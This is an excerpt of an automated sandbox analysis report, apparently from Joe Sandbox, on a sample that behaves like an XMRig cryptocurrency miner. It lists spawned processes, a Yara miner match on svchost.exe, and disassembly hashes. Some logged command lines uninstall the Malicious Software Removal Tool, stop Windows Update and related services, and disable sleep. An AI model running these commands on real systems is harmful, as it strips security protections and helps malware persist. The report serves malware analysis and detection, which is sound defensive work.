                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:45
                                                    Start time:21:59:55
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:46
                                                    Start time:21:59:55
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:47
                                                    Start time:21:59:55
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff685d90000
                                                    File size:316'416 bytes
                                                    MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:48
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:49
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:50
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:51
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:52
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:53
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:54
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                    Imagebase:0x7ff644e20000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:55
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:56
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:57
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:58
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:59
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:60
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:61
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    Imagebase:0x7ff71c480000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:62
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:63
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    General

                                                    Target ID:64
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff63af10000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:65
                                                    Start time:21:59:56
                                                    Start date:16/09/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:svchost.exe
                                                    Imagebase:0x7ff698830000
                                                    File size:57'360 bytes
                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFAC2AFF14F Relevance: 6.3, Strings: 2, Instructions: 3759COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3$H
                                                      • API String ID: 0-1350806239
                                                      • Opcode ID: 6089a87dc83b9ba0959ab1428f21443b0b6a9fa0cea1f54d44ec888dc85e6936
                                                      • Instruction ID: 408ade8bae2a65d1a29463153bdb5140c6f13546d8560250b17d4569cbb06464
                                                      • Opcode Fuzzy Hash: 6089a87dc83b9ba0959ab1428f21443b0b6a9fa0cea1f54d44ec888dc85e6936
                                                      • Instruction Fuzzy Hash: 96537FB0A1DA894FD795EB78C0596797BE2EF9A311F0144FED04DCB3A6DE289801C742
                                                      Function 00007FFAC2B0F9F8 Relevance: .9, Instructions: 859COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 391450ed56c560de72136443d40ee0a5653f15ee364046616a066095b5986ccd
                                                      • Instruction ID: da187dd2dca8d7c501db73b17d076bea644197763bc630b686c0d539d482ebbd
                                                      • Opcode Fuzzy Hash: 391450ed56c560de72136443d40ee0a5653f15ee364046616a066095b5986ccd
                                                      • Instruction Fuzzy Hash: C242A170A18A194FEB58EF68C4856B9B3E2EF99300F108579D45EC739ADE74E842C781
                                                      Function 00007FFAC2AFAF46 Relevance: .5, Instructions: 472COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ebe7541e994318ebcf2bd1c805a3564968441219ba3a1d8f83dce6985f95f954
                                                      • Instruction ID: a72dbb6d0eb58f09f823f2ac6e354f8e01a8b0fc87a7984dda432c4f19e272f6
                                                      • Opcode Fuzzy Hash: ebe7541e994318ebcf2bd1c805a3564968441219ba3a1d8f83dce6985f95f954
                                                      • Instruction Fuzzy Hash: DBF1D730518A8D8FEBA8DF28C8457E977E1FF59310F04826AD84DC7795CB78D9458B82
                                                      Function 00007FFAC2AFBCF2 Relevance: .5, Instructions: 460COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c69c9dbeb043955d513465ba8c29c9090c913c59580743ccf0667c722a76687
                                                      • Instruction ID: 2b894c1c7342326730bf96158471c6d2c20257975c8d50d6e27c1b5cc35e81fa
                                                      • Opcode Fuzzy Hash: 2c69c9dbeb043955d513465ba8c29c9090c913c59580743ccf0667c722a76687
                                                      • Instruction Fuzzy Hash: 25E1D330918A8D8FEBA8DF28C8557E977E1EF59310F04826ED84DC7395DB78D9418B82
                                                      Function 00007FFAC2AFD9B6 Relevance: 5.2, Strings: 3, Instructions: 1425COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: IL_L$cL_H$L_H
                                                      • API String ID: 0-1523046267
                                                      • Opcode ID: ceca62006a9163795f102cb98785970af3068977c5aea1a1274d56e7a59d0b3a
                                                      • Instruction ID: 7e16c0a83563d4f9893796facdabeb90f5469665746fb5d03ec1f7592f02e2ee
                                                      • Opcode Fuzzy Hash: ceca62006a9163795f102cb98785970af3068977c5aea1a1274d56e7a59d0b3a
                                                      • Instruction Fuzzy Hash: 07A20891A1EACA0FE39ADB3894552B97BD1EF96350F0444FED08DCB39BDD689806C341
                                                      Function 00007FFAC2B0FB28 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0N_H
                                                      • API String ID: 0-3998158670
                                                      • Opcode ID: 666554672d50864db6679d15b2fe4926c745b22d4be8087511aa52eb2c2b9cd2
                                                      • Instruction ID: 6c92782965e32da1a883106f9fb0d7b978cf6ce98f8f27a4e4b3c4ceb6b81551
                                                      • Opcode Fuzzy Hash: 666554672d50864db6679d15b2fe4926c745b22d4be8087511aa52eb2c2b9cd2
                                                      • Instruction Fuzzy Hash: 42A1D161F18A494FE796EB38D4696F877D2EF9A311B1480BAD44DC73A7DD28EC028341
                                                      Function 00007FFAC2AF5725 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_
                                                      • API String ID: 0-904238881
                                                      • Opcode ID: c7470a31e023217d29e7800bdf7937a5fff74dcd6d673465c42efff83a95c093
                                                      • Instruction ID: 24eb7c0adee1cde950595579bb731ffb2f0f349a91753d0c996e6cc13c2232e5
                                                      • Opcode Fuzzy Hash: c7470a31e023217d29e7800bdf7937a5fff74dcd6d673465c42efff83a95c093
                                                      • Instruction Fuzzy Hash: 34517A41E2E6C60EE707AB3858620E93FA09F93254B4985B7D4EDCB2D7DC4C590993A2
                                                      Function 00007FFAC2AF5588 Relevance: .7, Instructions: 698COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7762e04d249fe8b25b7c71eb23e0ef9d1c69204905ff13e725a48058bcef6fa9
                                                      • Instruction ID: 28f540a2c084451a4c6943aed963a4c0bc3c05827af8404ef6695dc791c530f9
                                                      • Opcode Fuzzy Hash: 7762e04d249fe8b25b7c71eb23e0ef9d1c69204905ff13e725a48058bcef6fa9
                                                      • Instruction Fuzzy Hash: EF127B71B28E494FE795FB2CC45967876D2EF5A311B1540BAE40ECB3A7DE28EC418381
                                                      Function 00007FFAC2B0F9E8 Relevance: .6, Instructions: 626COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02a0702cfb5413167a8e761525e72e524b97283892a0fca44b5350f0b779d8ee
                                                      • Instruction ID: abd4bddd3bd665bb46c094063328fb110760a98cf841df616b27ceaf5c89e41b
                                                      • Opcode Fuzzy Hash: 02a0702cfb5413167a8e761525e72e524b97283892a0fca44b5350f0b779d8ee
                                                      • Instruction Fuzzy Hash: DA123F70A18A1D8FDB59EF58C885AB9B3F1EB59300F108179D44ED735ADA74F882CB81
                                                      Function 00007FFAC2AFD0A8 Relevance: .6, Instructions: 604COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b5ba48648cc72b2755dbe58e3de5622bf51c7fe4e7088cb10baf90522989eb5
                                                      • Instruction ID: 4b4e87005c899a3a10a61e123c43ec37b48545a905ef6eb068b72138cf225727
                                                      • Opcode Fuzzy Hash: 3b5ba48648cc72b2755dbe58e3de5622bf51c7fe4e7088cb10baf90522989eb5
                                                      • Instruction Fuzzy Hash: 4B02BFB1B18E4D4FEB99EB6CC4596B977E2EF59311B1081BAD00DCB396CD28AC05C781
                                                      Function 00007FFAC2AF5AFD Relevance: .3, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eea09bdc508fcfae40e16a0b5fa575e9e3dbeb167e0dbbd23851204bc260a36f
                                                      • Instruction ID: 52502e3a3898b562367ca01405798499790343b94b69e1f1348ed318900a20dd
                                                      • Opcode Fuzzy Hash: eea09bdc508fcfae40e16a0b5fa575e9e3dbeb167e0dbbd23851204bc260a36f
                                                      • Instruction Fuzzy Hash: 30A1B251B2EA8A4FE399EB7888257783BD1EF86200F5444BAD05ECB3D7DD5CAC058352
                                                      Function 00007FFAC2B04631 Relevance: .3, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: acfd8a5cf133fabb270dc368e32bf1e515e88b8a7adea3ef942dfe59bb3742de
                                                      • Instruction ID: c7e7f6bcb4e8cab55bbda13cbcbf3e3b8f517927494c72b4bf054d7ebb70f5b9
                                                      • Opcode Fuzzy Hash: acfd8a5cf133fabb270dc368e32bf1e515e88b8a7adea3ef942dfe59bb3742de
                                                      • Instruction Fuzzy Hash: D1A1AD71A1894D4FEB85FF6CC449AB97BE1EF59311F1080BAE40DC73A6DE64AC418781
                                                      Function 00007FFAC2AFB906 Relevance: .3, Instructions: 331COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66a957bd67fd6528faca8e2923ab29c0fae7d6a0f68aac66f1547910655a8f8c
                                                      • Instruction ID: 683b43557190d3147856c4477712c0f86f68d9343e921c03a8228b99d7c14fe3
                                                      • Opcode Fuzzy Hash: 66a957bd67fd6528faca8e2923ab29c0fae7d6a0f68aac66f1547910655a8f8c
                                                      • Instruction Fuzzy Hash: 7AB1C570518A8D8FEB59DF28C8457E93BE1EF59310F04826AE84DC7396CA78D945CB82
                                                      Function 00007FFAC2AF5DB3 Relevance: .2, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9217a03a5512b7f0feae54dbb3a91cec6ef3d144b237aa0b4588550e688758cb
                                                      • Instruction ID: fd28121eee8188744f9e0af9f0d7fea75410aa66207da45b9b49b096dac0c406
                                                      • Opcode Fuzzy Hash: 9217a03a5512b7f0feae54dbb3a91cec6ef3d144b237aa0b4588550e688758cb
                                                      • Instruction Fuzzy Hash: BB71B250F2EA8A0FE799EB7844257796BD2EF86300F5441BAD05EC73D7DC5CA8058352
                                                      Function 00007FFAC2B02864 Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ef8827de5114cdd278d78df4a06126a1349d12074eb7497351bcaf397a64283
                                                      • Instruction ID: 16798094d93957ca58032adcb9f0add807e1c13c869f1f95058f30c581491c02
                                                      • Opcode Fuzzy Hash: 4ef8827de5114cdd278d78df4a06126a1349d12074eb7497351bcaf397a64283
                                                      • Instruction Fuzzy Hash: C161ADA0B18E4D4FEB99EB28C4546B977E2EF99300F1081BAE05DC7396CE24EC45C781
                                                      Function 00007FFAC2AF5580 Relevance: .2, Instructions: 213COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 309ce3d64366ee7291cd6a1c54dc2de7b7265726bc62dc75f11629de589df47c
                                                      • Instruction ID: 4f141a4a77aef4da3f5cdc9c9c2a18a05effd61aef5b6d564334e8904d86323b
                                                      • Opcode Fuzzy Hash: 309ce3d64366ee7291cd6a1c54dc2de7b7265726bc62dc75f11629de589df47c
                                                      • Instruction Fuzzy Hash: 6651E461F29A4D4FD785FB7C84196BC77D2EF5A211B4440BAD00EC73A7DD68AC018741
                                                      Function 00007FFAC2B045C0 Relevance: .2, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a703da3e50720ffc9adf82cb0f579e910ea2b06281c1499662814f795f107780
                                                      • Instruction ID: 646c7a8c8ab7a2847b24b5dd810bfc577a9deb02b81c1d88214be7095859f623
                                                      • Opcode Fuzzy Hash: a703da3e50720ffc9adf82cb0f579e910ea2b06281c1499662814f795f107780
                                                      • Instruction Fuzzy Hash: C5518261F2DD4A0FE789FB38841A6BC66D2EF9A251B4480BAE40EC73D7DD5CAC414381
                                                      Function 00007FFAC2B01776 Relevance: .2, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34b621a2598ba52256ddeab7d12c724f04a1c54106149a2cc94cee83f53b8660
                                                      • Instruction ID: cb6e6e8b4073f175033ef5014595a006e81703c4c2ddaa03e222ef0b8f815bab
                                                      • Opcode Fuzzy Hash: 34b621a2598ba52256ddeab7d12c724f04a1c54106149a2cc94cee83f53b8660
                                                      • Instruction Fuzzy Hash: 2A51C691A1DACA0FD38AAB3C48255B96BD1DF97250B0485FBC08ECB3E7DD5C980A8351
                                                      Function 00007FFAC2B0144D Relevance: .2, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.295361432641.00007FFAC2AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAC2AF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffac2af0000_System.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9879855425397422bb69811f0a910842459c89c75be2f69e5deb4c35ee065501
                                                      • Instruction ID: 1868bde9b5b63d8c2b9bff100ba59c488fe4bd73868ca5edf3e4f57131db3f86
                                                      • Opcode Fuzzy Hash: 9879855425397422bb69811f0a910842459c89c75be2f69e5deb4c35ee065501
                                                      • Instruction Fuzzy Hash: BC513EA291CB850FE35ADB2CC8451F97BD0EF5A350B0486BEE08EC7396DD68D8068781
                                                      Function 00007FFAC2B01290 Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
